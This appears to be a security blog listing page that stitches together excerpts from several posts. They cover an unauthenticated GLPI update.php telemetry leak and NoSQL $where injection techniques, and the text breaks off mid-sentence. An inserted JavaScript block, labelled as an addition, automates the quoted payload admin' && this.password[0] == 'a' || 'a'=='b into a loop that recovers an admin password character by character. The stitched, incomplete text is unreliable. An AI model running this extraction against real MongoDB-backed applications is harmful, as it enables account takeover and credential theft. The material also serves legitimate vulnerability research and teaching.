Injection

Leakymetry: Circumventing GLPI Authentication

Intro

GLPI (Gestionnaire libre de parc informatique) is a popular open-source IT asset management and helpdesk application, widely used in France and Brazil. It is used to build a map of a network through an inventory plugin, and also to collect users' issues through a ticket system.

Starting research

While I was wondering how the update mechanism worked in GLPI, I saw something really interesting in this file. It is important to note that most GLPI files are not accessible without authentication, which keeps the attack surface of this software small. However, the update.php script is reachable by an unauthenticated user, and this file contains juicy information. I started looking at it and immediately saw that, under certain parameters, this script disclosed telemetry information.

NoSQL error-based injection

TL;DR: How to do NoSQL error-based injection

In this second blog post on NoSQL injection (read the first one here), I discuss how to do error-based injection. I think this might be a novel approach; at least my Google search-fu isn't finding anything. When trying to extract information via NoSQL injection, you typically rely on Boolean conditions to figure out a character. PortSwigger has a couple of examples here. In one of PortSwigger's examples, they consider the case where you can look up another user's profile via a website that is vulnerable to NoSQL $where injection. To get the first character of the admin user's password, we use the payload admin' && this.password[0] == 'a' || 'a'=='b
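The Boolean technique described above, as an added example that is not part of the original post or of PortSwigger's lab: a tiny in-process stand-in for MongoDB's $where evaluation (the server-side JavaScript that $where runs against each document), a lookup that concatenates user input into that expression, and an extraction loop that applies the quoted payload shape position by position. The collection, the field names username/password and the "found / not found" oracle are all assumptions made for the example; it generalizes the single-character payload into full password recovery.

```javascript
// Added example, not from the original post. Simulates $where injection offline:
// no MongoDB is involved, `new Function` plays the role of the server-side
// JavaScript that $where evaluates with `this` bound to each document.

// Constructed sample collection (assumption: fields named username/password).
const users = [
  { username: 'admin', password: 's3cr3t' },
  { username: 'alice', password: 'hunter2' },
];

// Vulnerable lookup: the user-supplied name is concatenated straight into the
// $where string, as in the injectable profile page described in the text.
function buildWhere(input) {
  return `this.username == '${input}'`;
}

// Stand-in for $where: evaluate the expression once per document, return matches.
function runWhere(whereSrc) {
  const predicate = new Function(`return (${whereSrc});`);
  return users.filter(doc => predicate.call(doc));
}

// The only thing the attacker observes: did a profile come back or not?
function profileFound(input) {
  return runWhere(buildWhere(input)).length > 0;
}

// The payload from the post, parameterised on character position and guess.
// The application appends the closing quote, so the expression becomes
//   this.username == 'admin' && this.password[pos] == 'ch' || 'a'=='b'
// and, since && binds tighter than ||, it is true only when the guess is right.
function payload(pos, ch) {
  return `admin' && this.password[${pos}] == '${ch}' || 'a'=='b`;
}

const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789';

// Recover the admin password one character at a time via the Boolean oracle.
// Past the end of the string this.password[pos] is undefined, so no guess
// matches and the loop stops.
function extractPassword(maxLen = 32) {
  let recovered = '';
  for (let pos = 0; pos < maxLen; pos++) {
    let hit = null;
    for (const ch of ALPHABET) {
      if (profileFound(payload(pos, ch))) { hit = ch; break; }
    }
    if (hit === null) break;
    recovered += hit;
  }
  return recovered;
}

console.log('recovered admin password:', extractPassword());
```

Each character costs up to one request per alphabet symbol, which is why the post goes on to look for something cheaper than a pure yes/no oracle; the loop above also stops early if the password contains a character outside ALPHABET, so a real attack would widen the alphabet or switch to comparing char codes with ranges.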

Getting rid of pre- and post-conditions in NoSQL injections

TL;DR: I found a cool way to get rid of pre-conditions in NoSQL syntax injections

I have been investigating NoSQL injection for a bit, trying to make it better, or at least somewhat equivalent to SQL injection. One of the things that is tricky with NoSQL injection is getting rid of pre- and post-conditions. For this post I'm focusing on MongoDB, so s/NoSQL injection/Mongo injection/g.

Background

In case you forgot, most MongoDB queries will look something like this in the background: